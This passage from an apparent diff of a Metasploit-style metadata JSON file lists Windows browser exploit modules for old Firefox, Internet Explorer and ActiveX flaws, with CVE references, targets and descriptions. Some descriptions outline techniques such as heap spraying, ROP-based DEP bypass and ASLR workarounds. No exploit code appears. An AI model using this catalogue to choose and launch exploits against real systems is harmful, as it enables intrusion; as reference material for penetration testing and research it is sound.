"windows/browser/mozilla_interleaved_write", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_mchannel": { + "name": "Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability", + "fullname": "exploit/windows/browser/mozilla_mchannel", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-05-10", + "type": "exploit", + "author": [ + "regenrecht", + "Rh0", + "mr_me " + ], + "description": "This module exploits a use after free vulnerability in Mozilla\n Firefox 3.6.16. An OBJECT Element mChannel can be freed via the\n OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel\n becomes a dangling pointer and can be reused when setting the OBJECTs\n data attribute. (Discovered by regenrecht). This module uses heapspray\n with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionlay,\n a windows 7 target was provided using JAVA 6 and below to avoid aslr.", + "references": [ + "CVE-2011-0065", + "OSVDB-72085", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=634986", + "URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Firefox 3.6.16 on Windows XP SP3", + "Firefox 3.6.16 on Windows 7 + Java" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_mchannel.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_mchannel", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_nssvgvalue": { + "name": "Firefox nsSVGValue Out-of-Bounds Access Vulnerability", + "fullname": "exploit/windows/browser/mozilla_nssvgvalue", + "aliases": [], + "rank": 200, + "disclosure_date": 
"2011-12-06", + "type": "exploit", + "author": [ + "regenrecht", + "Lincoln ", + "corelanc0d3r " + ], + "description": "This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1).\n The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y)\n uses a loop which can result in an out-of-bounds access to attacker-controlled memory.\n The mObserver ElementAt() function (which picks up pointers), does not validate\n if a given index is out of bound. If a custom observer of nsSVGValue is created,\n which removes elements from the original observer,\n and memory layout is manipulated properly, the ElementAt() function might pick up\n an attacker provided pointer, which can be leveraged to gain remote arbitrary\n code execution.", + "references": [ + "CVE-2011-3658", + "OSVDB-77953", + "ZDI-12-056", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708186" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP - Firefox 7", + "Windows XP - Firefox 8 (<= 8.0.1)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_nssvgvalue.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_nssvgvalue", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_nstreerange": { + "name": "Mozilla Firefox \"nsTreeRange\" Dangling Pointer Vulnerability", + "fullname": "exploit/windows/browser/mozilla_nstreerange", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-02-02", + "type": "exploit", + "author": [ + "regenrecht", + "xero" + ], + "description": "This module exploits a code execution vulnerability in Mozilla Firefox\n 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.\n By overwriting a subfunction of invalidateSelection it is possible to 
free the\n nsTreeRange object that the function currently operates on.\n Any further operations on the freed object can result in remote code execution.\n Utilizing the call setup the function provides it's possible to bypass DEP\n without the need for a ROP. Sadly this exploit is still either dependent\n on Java or bound by ASLR because Firefox doesn't employ any ASLR-free\n modules anymore.", + "references": [ + "CVE-2011-0073", + "OSVDB-72087", + "BID-47663", + "ZDI-11-157", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=630919", + "URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Auto (Direct attack against Windows XP, otherwise through Java, if enabled)", + "Firefox Runtime, fails with ASLR", + "Java Runtime (7.10.3052.4), best against ASLR", + "Java JVM (20.1.0.02)", + "Java Regutils (6.0.260.3)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_nstreerange.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_nstreerange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_reduceright": { + "name": "Mozilla Firefox Array.reduceRight() Integer Overflow", + "fullname": "exploit/windows/browser/mozilla_reduceright", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-06-21", + "type": "exploit", + "author": [ + "Chris Rohlf", + "Yan Ivnitskiy", + "Matteo Memelli", + "dookie2000ca", + "sinn3r ", + "mr_me ", + "TecR0c " + ], + "description": "This module exploits a vulnerability found in Mozilla Firefox 3.6. 
When an\n array object is configured with a large length value, the reduceRight() method\n may cause an invalid index being used, allowing arbitrary remote code execution.\n Please note that the exploit requires a longer amount of time (compare to a\n typical browser exploit) in order to gain control of the machine.", + "references": [ + "CVE-2011-2371", + "OSVDB-73184", + "EDB-17974", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=664009" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Mozilla Firefox 3.6.16 (no JAVA)", + "Mozilla Firefox 3.6.16 (JAVA)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_reduceright.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_reduceright", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms03_020_ie_objecttype": { + "name": "MS03-020 Microsoft Internet Explorer Object Type", + "fullname": "exploit/windows/browser/ms03_020_ie_objecttype", + "aliases": [], + "rank": 300, + "disclosure_date": "2003-06-04", + "type": "exploit", + "author": [ + "skape " + ], + "description": "This module exploits a vulnerability in Internet Explorer's\n handling of the OBJECT type attribute.", + "references": [ + "CVE-2003-0344", + "OSVDB-2967", + "BID-7806", + "MSB-MS03-020" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows NT/XP/2003 Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms03_020_ie_objecttype", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": null + }, + "exploit_windows/browser/ms05_054_onload": { + "name": "MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution", + "fullname": "exploit/windows/browser/ms05_054_onload", + "aliases": [], + "rank": 300, + "disclosure_date": "2005-11-21", + "type": "exploit", + "author": [ + "Benjamin Tobias Franz", + "Stuart Pearson", + "Sam Sharps" + ], + "description": "This bug is triggered when the browser handles a JavaScript 'onLoad' handler in\n conjunction with an improperly initialized 'window()' JavaScript function.\n This exploit results in a call to an address lower than the heap. The javascript\n prompt() places our shellcode near where the call operand points to. We call\n prompt() multiple times in separate iframes to place our return address.\n We hide the prompts in a popup window behind the main window. We spray the heap\n a second time with our shellcode and point the return address to the heap. I use\n a fairly high address to make this exploit more reliable. IE will crash when the\n exploit completes. 
Also, please note that Internet Explorer must allow popups\n in order to continue exploitation.", + "references": [ + "MSB-MS05-054", + "CVE-2005-1790", + "OSVDB-17094", + "BID-13799" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Internet Explorer 6 on Windows XP", + "Internet Explorer 6 Windows 2000" + ], + "mod_time": "2021-04-05 13:03:42 +0000", + "path": "/modules/exploits/windows/browser/ms05_054_onload.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms05_054_onload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms06_001_wmf_setabortproc": { + "name": "Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution", + "fullname": "exploit/windows/browser/ms06_001_wmf_setabortproc", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-12-27", + "type": "exploit", + "author": [ + "hdm ", + "san ", + "O600KO78RUS " + ], + "description": "This module exploits a vulnerability in the GDI library included with\n Windows XP and 2003. This vulnerability uses the 'Escape' metafile function\n to execute arbitrary code through the SetAbortProc procedure. 
This module\n generates a random WMF record stream for each request.", + "references": [ + "CVE-2005-4560", + "OSVDB-21987", + "MSB-MS06-001", + "BID-16074", + "URL-http://wvware.sourceforge.net/caolan/ora-wmf.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP/2003/Vista Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms06_001_wmf_setabortproc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms06_013_createtextrange": { + "name": "MS06-013 Microsoft Internet Explorer createTextRange() Code Execution", + "fullname": "exploit/windows/browser/ms06_013_createtextrange", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-03-19", + "type": "exploit", + "author": [ + "Faithless ", + "Darkeagle ", + "hdm ", + "justfriends4n0w ", + "Unknown" + ], + "description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer.\n Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under\n certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point\n to a very remote, non-existent memory location. This module is the result of merging three\n different exploit submissions and has only been reliably tested against Windows XP SP2.\n This vulnerability was independently discovered by multiple parties. 
The heap spray method\n used by this exploit was pioneered by Skylined.", + "references": [ + "CVE-2006-1359", + "OSVDB-24050", + "MSB-MS06-013", + "BID-17196", + "US-CERT-VU-876678", + "URL-http://web.archive.org/web/20060418044756/http://secunia.com:80/secunia_research/2006-7/advisory/", + "URL-https://seclists.org/lists/bugtraq/2006/Mar/0410.html", + "URL-https://seclists.org/lists/fulldisclosure/2006/Mar/1439.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)", + "Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/ms06_013_createtextrange.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms06_013_createtextrange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms06_055_vml_method": { + "name": "MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution", + "fullname": "exploit/windows/browser/ms06_055_vml_method", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-09-19", + "type": "exploit", + "author": [ + "hdm ", + "Aviv Raff ", + "Trirat Puttaraksa (Kira) ", + "Mr.Niega ", + "M. Shirk " + ], + "description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer using\n a buffer overflow in the VML processing code (VGX.dll). 
This module has been tested on\n Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.", + "references": [ + "CVE-2006-4868", + "OSVDB-28946", + "MSB-MS06-055", + "BID-20096" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows NT 4.0 -> Windows 2003 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms06_055_vml_method.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms06_055_vml_method", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms06_057_webview_setslice": { + "name": "MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow", + "fullname": "exploit/windows/browser/ms06_057_webview_setslice", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-07-17", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a flaw in the WebViewFolderIcon ActiveX control\n included with Windows 2000, Windows XP, and Windows 2003. 
This flaw was published\n during the Month of Browser Bugs project (MoBB #18).", + "references": [ + "CVE-2006-3730", + "OSVDB-27110", + "MSB-MS06-057", + "BID-19030" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / IE 6.0SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms06_057_webview_setslice.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms06_057_webview_setslice", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms06_067_keyframe": { + "name": "MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability", + "fullname": "exploit/windows/browser/ms06_067_keyframe", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-11-14", + "type": "exploit", + "author": [ + "Alexander Sotirov ", + "skape " + ], + "description": "This module exploits a heap overflow vulnerability in the KeyFrame method of the\n direct animation ActiveX control. 
This is a port of the exploit implemented by\n Alexander Sotirov.", + "references": [ + "CVE-2006-4777", + "OSVDB-28842", + "BID-20047", + "MSB-MS06-067" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000/XP/2003 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms06_067_keyframe.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms06_067_keyframe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms06_071_xml_core": { + "name": "MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling", + "fullname": "exploit/windows/browser/ms06_071_xml_core", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-10-10", + "type": "exploit", + "author": [ + "Trirat Puttaraksa " + ], + "description": "This module exploits a code execution vulnerability in Microsoft XML Core Services which\n exists in the XMLHTTP ActiveX control. This module is the modified version of\n http://www.milw0rm.com/exploits/2743 - credit to str0ke. 
This module has been successfully\n tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6\n + Microsoft XML Core Services 4.0 SP2.", + "references": [ + "CVE-2006-5745", + "OSVDB-29425", + "MSB-MS06-071", + "BID-20915" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4 -> Windows 2003 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms06_071_xml_core.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms06_071_xml_core", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms07_017_ani_loadimage_chunksize": { + "name": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)", + "fullname": "exploit/windows/browser/ms07_017_ani_loadimage_chunksize", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-03-28", + "type": "exploit", + "author": [ + "hdm ", + "skape ", + "Solar Eclipse " + ], + "description": "This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function in USER32.dll. The flaw can be triggered through\n Internet Explorer 6 and 7 by using the CURSOR style sheet directive\n to load a malicious .ANI file. The module can also exploit Mozilla\n Firefox by using a UNC path in a moz-icon URL and serving the .ANI file\n over WebDAV. 
The vulnerable code in USER32.dll will catch any\n exceptions that occur while the invalid cursor is loaded, causing the\n exploit to silently fail when the wrong target has been chosen.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.", + "references": [ + "CVE-2007-0038", + "OSVDB-33629", + "BID-23194", + "MSB-MS07-017" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista", + "IE6 on Windows NT, 2000, XP, 2003 (all languages)", + "IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)", + "IE7 and Firefox on Windows Vista (all languages)", + "Firefox on Windows XP (English)", + "Firefox on Windows 2003 (English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms07_017_ani_loadimage_chunksize", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms08_041_snapshotviewer": { + "name": "Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download", + "fullname": "exploit/windows/browser/ms08_041_snapshotviewer", + "aliases": [], + "rank": 600, + "disclosure_date": "2008-07-07", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module allows remote attackers to place arbitrary files on a users file system\n via the Microsoft Office Snapshot Viewer ActiveX Control.", + "references": [ + "CVE-2008-2463", + "OSVDB-46749", + "MSB-MS08-041", + "BID-30114" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 
"/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms08_041_snapshotviewer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms08_053_mediaencoder": { + "name": "Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow", + "fullname": "exploit/windows/browser/ms08_053_mediaencoder", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-09-09", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Windows Media Encoder 9. When\n sending an overly long string to the GetDetailsString() method of wmex.dll\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-3008", + "OSVDB-47962", + "BID-31065", + "MSB-MS08-053" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2-SP3 IE 6.0 SP0-SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms08_053_mediaencoder.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms08_053_mediaencoder", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms08_070_visual_studio_msmask": { + "name": "Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow", + "fullname": "exploit/windows/browser/ms08_070_visual_studio_msmask", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-08-13", + "type": "exploit", + "author": [ + "koshi", + "MC " + ], + "description": "This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0.\n When passing a specially crafted string to the Mask parameter of the\n Mdmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary\n 
code.", + "references": [ + "CVE-2008-3704", + "OSVDB-47475", + "BID-30674", + "MSB-MS08-070" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 IE 6.0 SP0-SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms08_070_visual_studio_msmask", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms08_078_xml_corruption": { + "name": "MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption", + "fullname": "exploit/windows/browser/ms08_078_xml_corruption", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-12-07", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a vulnerability in the data binding feature of Internet\n Explorer. In order to execute code reliably, this module uses the .NET DLL\n memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is\n used to create a fake vtable at a known location with all methods pointing\n to our payload. 
Since the .text segment of the .NET DLL is non-writable, a\n prefixed code stub is used to copy the payload into a new memory segment and\n continue execution from there.", + "references": [ + "CVE-2008-4844", + "OSVDB-50622", + "BID-32721", + "MSB-MS08-078", + "URL-https://web.archive.org/web/20080913064223/http://taossa.com/archive/bh08sotirovdowd.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms08_078_xml_corruption.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms08_078_xml_corruption", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms09_002_memory_corruption": { + "name": "MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption", + "fullname": "exploit/windows/browser/ms09_002_memory_corruption", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-02-10", + "type": "exploit", + "author": [ + "dean " + ], + "description": "This module exploits an error related to the CFunctionPointer function when attempting\n to access uninitialized memory. 
A remote attacker could exploit this vulnerability to\n corrupt memory and execute arbitrary code on the system with the privileges of the victim.", + "references": [ + "CVE-2009-0075", + "OSVDB-51839", + "MSB-MS09-002" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2-SP3 / Windows Vista SP0 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms09_002_memory_corruption.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms09_002_memory_corruption", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms09_043_owc_htmlurl": { + "name": "Microsoft OWC Spreadsheet HTMLURL Buffer Overflow", + "fullname": "exploit/windows/browser/ms09_043_owc_htmlurl", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-08-11", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a buffer overflow in Microsoft's Office Web Components.\n When passing an overly long string as the \"HTMLURL\" parameter an attacker can\n execute arbitrary code.", + "references": [ + "CVE-2009-1534", + "OSVDB-56916", + "BID-35992", + "MSB-MS09-043", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 - IE6 - Office XP SP0", + "Windows XP SP3 - IE6 - Office XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms09_043_owc_htmlurl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/browser/ms09_043_owc_msdso": { + "name": "Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption", + "fullname": "exploit/windows/browser/ms09_043_owc_msdso", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-07-13", + "type": "exploit", + "author": [ + "unknown", + "hdm ", + "Ahmed Obied", + "DSR! " + ], + "description": "This module exploits a memory corruption vulnerability within versions 10 and 11 of\n the Office Web Component Spreadsheet ActiveX control. This module was based on\n an exploit found in the wild.", + "references": [ + "CVE-2009-1136", + "OSVDB-55806", + "MSB-MS09-043", + "URL-http://ahmed.obied.net/software/code/exploits/ie_owc.py", + "EDB-9163", + "URL-https://web.archive.org/web/20090716143635/http://xeye.us/blog/2009/07/one-0day/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms09_043_owc_msdso.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms09_043_owc_msdso", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms09_072_style_object": { + "name": "MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption", + "fullname": "exploit/windows/browser/ms09_072_style_object", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-11-20", + "type": "exploit", + "author": [ + "securitylab.ir ", + "jduck " + ], + "description": "This module exploits a vulnerability in the getElementsByTagName function\n as implemented within Internet Explorer.", + "references": [ + "MSB-MS09-072", + "CVE-2009-3672", + "OSVDB-50622", + "BID-37085", + "URL-https://web.archive.org/web/20090316061713/http://taossa.com/archive/bh08sotirovdowd.pdf" + ], + 
"platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms09_072_style_object.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms09_072_style_object", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_002_aurora": { + "name": "MS10-002 Microsoft Internet Explorer \"Aurora\" Memory Corruption", + "fullname": "exploit/windows/browser/ms10_002_aurora", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-01-14", + "type": "exploit", + "author": [ + "unknown", + "hdm " + ], + "description": "This module exploits a memory corruption flaw in Internet Explorer. This\n flaw was found in the wild and was a key component of the \"Operation Aurora\"\n attacks that lead to the compromise of a number of high profile companies. The\n exploit code is a direct port of the public sample published to the Wepawet\n malware analysis site. 
The technique used by this module is currently identical\n to the public sample, as such, only Internet Explorer 6 can be reliably exploited.", + "references": [ + "MSB-MS10-002", + "CVE-2010-0249", + "OSVDB-61697", + "URL-https://web.archive.org/web/20100609073233/http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_002_aurora.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_002_aurora", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_002_ie_object": { + "name": "MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free", + "fullname": "exploit/windows/browser/ms10_002_ie_object", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-01-21", + "type": "exploit", + "author": [ + "Peter Vreugdenhil", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Internet Explorer's\n mshtml component. Due to the way IE handles objects in memory, it is\n possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext\n to be used even after it gets freed, therefore allowing remote code\n execution under the context of the user.\n\n This particular vulnerability was also one of 2012's Pwn2Own\n challenges, and was later explained by Peter Vreugdenhil with exploitation\n details. 
Instead of Peter's method, this module uses heap spraying like\n the 99% to store a specially crafted memory layout before re-using the\n freed memory.", + "references": [ + "MSB-MS10-002", + "CVE-2010-0248", + "OSVDB-61914", + "URL-http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup", + "ZDI-10-014" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 8 on Windows XP SP3", + "IE 8 on Windows 7 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_002_ie_object.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_002_ie_object", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_018_ie_behaviors": { + "name": "MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free", + "fullname": "exploit/windows/browser/ms10_018_ie_behaviors", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-03-09", + "type": "exploit", + "author": [ + "unknown", + "Trancer ", + "Nanika", + "jduck " + ], + "description": "This module exploits a use-after-free vulnerability within the DHTML behaviors\n functionality of Microsoft Internet Explorer versions 6 and 7. This bug was\n discovered being used in-the-wild and was previously known as the \"iepeers\"\n vulnerability. The name comes from Microsoft's suggested workaround to block\n access to the iepeers.dll file.\n\n According to Nico Waisman, \"The bug itself is when trying to persist an object\n using the setAttribute, which end up calling VariantChangeTypeEx with both the\n source and 